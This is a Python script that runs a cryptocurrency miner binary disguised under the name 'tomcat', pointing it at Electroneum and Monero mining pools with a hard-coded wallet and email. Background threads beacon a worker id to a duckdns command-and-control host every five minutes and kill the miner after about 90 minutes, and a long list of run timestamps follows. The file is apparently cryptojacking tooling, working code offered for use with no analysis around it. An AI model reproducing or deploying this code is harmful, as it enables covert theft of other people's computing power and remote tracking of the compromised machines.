import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:12:03.753898
#2018-02-17 15:58:01.304322
#2018-02-17 17:45:07.523824
#2018-02-17 19:33:01.818339
#2018-02-17 21:21:01.362858
#2018-02-17 23:04:08.650013
#2018-02-18 00:51:07.629384
#2018-02-18 02:40:04.061405
#2018-02-18 04:27:07.549072
#2018-02-18 06:18:06.876377
#2018-02-18 08:08:01.453841
#2018-02-18 09:55:01.511807
#2018-02-18 11:42:06.599725
#2018-02-18 13:27:05.018096
#2018-02-18 15:17:02.041436
#2018-02-18 17:06:02.120190
#2018-02-18 18:53:01.549111
#2018-02-18 20:39:07.681701
#2018-02-18 22:25:04.819839
#2018-02-19 00:14:05.130413
#2018-02-19 02:00:06.784080
#2018-02-19 03:47:06.989293
#2018-02-19 05:33:07.702079
#2018-02-19 07:21:02.168568
#2018-02-19 09:11:01.664790
#2018-02-19 10:59:07.163803
#2018-02-19 12:46:09.038219
#2018-02-19 14:32:08.769284
#2018-02-19 16:21:09.053049
#2018-02-19 18:08:07.082755
#2018-02-19 19:55:09.058880
#2018-02-19 21:43:07.600075
#2018-02-19 23:29:06.755964
#2018-02-20 01:16:06.056485
#2018-02-20 03:04:07.426270
#2018-02-20 04:52:06.463569
#2018-02-20 06:35:04.492744
#2018-02-20 08:20:01.862940
#2018-02-20 10:05:01.431968
#2018-02-20 11:49:01.523633
#2018-02-20 13:37:05.762397
#2018-02-20 15:20:01.360861
#2018-02-20 17:04:10.177420
#2018-02-20 18:51:07.270168
#2018-02-20 20:42:07.150263
#2018-02-20 22:28:07.088187
#2018-02-21 01:12:07.693971
#2018-02-21 03:01:04.702204
#2018-02-21 04:48:05.854091
#2018-02-21 06:31:05.132698
#2018-02-21 08:16:07.698901
#2018-02-21 10:02:07.136663
#2018-02-21 11:51:01.866469
#2018-02-21 13:42:10.084513
#2018-02-21 15:26:07.595306
#2018-02-21 17:16:09.360268
#2018-02-21 19:03:04.607169
#2018-02-21 20:50:01.294835
#2018-02-21 22:36:06.435375
#2018-02-22 00:25:03.047704
#2018-02-22 02:13:06.134572
#2018-02-22 03:58:04.209730
#2018-02-22 05:45:09.365054
#2018-02-22 07:29:07.768239
#2018-02-22 09:18:07.189023
#2018-02-22 11:05:06.408649
#2018-02-22 12:50:07.474207
#2018-02-22 14:37:01.954563
#2018-02-22 16:22:09.004237
#2018-02-22 18:10:12.154359
#2018-02-22 19:59:01.564666
#2018-02-22 21:48:04.243947
#2018-02-22 23:34:06.961656
#2018-02-23 01:22:06.696077
#2018-02-23 03:09:05.168323
#2018-02-23 04:56:07.274836
#2018-02-23 06:42:05.622071
#2018-02-23 08:32:07.641130
#2018-02-23 10:46:08.832056
#2018-02-23 12:41:03.738941
#2018-02-23 14:25:01.887254
#2018-02-23 16:16:04.271854
#2018-02-23 18:09:08.544396
#2018-02-23 19:55:07.811336
#2018-02-23 21:38:04.013589
#2018-02-23 23:25:07.548765
#2018-02-24 01:18:07.054890
#2018-02-24 03:11:05.634729
#2018-02-24 04:56:02.250516
#2018-02-24 06:39:07.117059
#2018-02-24 08:28:04.447257
#2018-02-24 10:14:05.023533
#2018-02-24 12:08:01.688913
#2018-02-24 13:55:04.128453
#2018-02-24 15:34:06.980861
#2018-02-24 17:29:05.874611
#2018-02-24 19:17:01.341865
#2018-02-24 21:04:07.864644
#2018-02-24 23:38:05.476880
#2018-02-25 03:47:07.148519
#2018-02-25 07:33:03.564497